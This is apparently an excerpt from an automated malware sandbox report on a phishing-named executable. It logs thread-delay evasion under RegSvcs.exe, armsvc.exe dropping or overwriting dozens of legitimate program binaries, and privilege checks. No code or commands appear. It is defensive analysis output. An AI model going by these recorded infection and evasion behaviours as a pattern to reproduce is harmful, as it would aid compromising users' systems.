Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596922	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596594	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596469	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596250	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596141	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595922	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595042	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594932	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594813	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594652	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594545	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594423	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594172	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594062	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 7405	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 2434	Jump to behavior
Source: C:\Windows\System32\msdtc.exe	Window / User API: threadDelayed 494	Jump to behavior
Source: C:\Windows\SysWOW64\perfhost.exe	Window / User API: threadDelayed 7345
Source: C:\Windows\SysWOW64\perfhost.exe	Window / User API: threadDelayed 2653

Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Windows Media Player\wmpnetwk.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\7z.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to dropped file
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Dropped PE file which has not been started: C:\Windows\System32\AppVClient.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\7zG.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Windows\System32\msiexec.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\updater.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Windows\System32\wbem\WmiApSrv.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\7zFM.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Windows\System32\VSSVC.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Windows\System32\SearchIndexer.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe	Jump to dropped file

Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
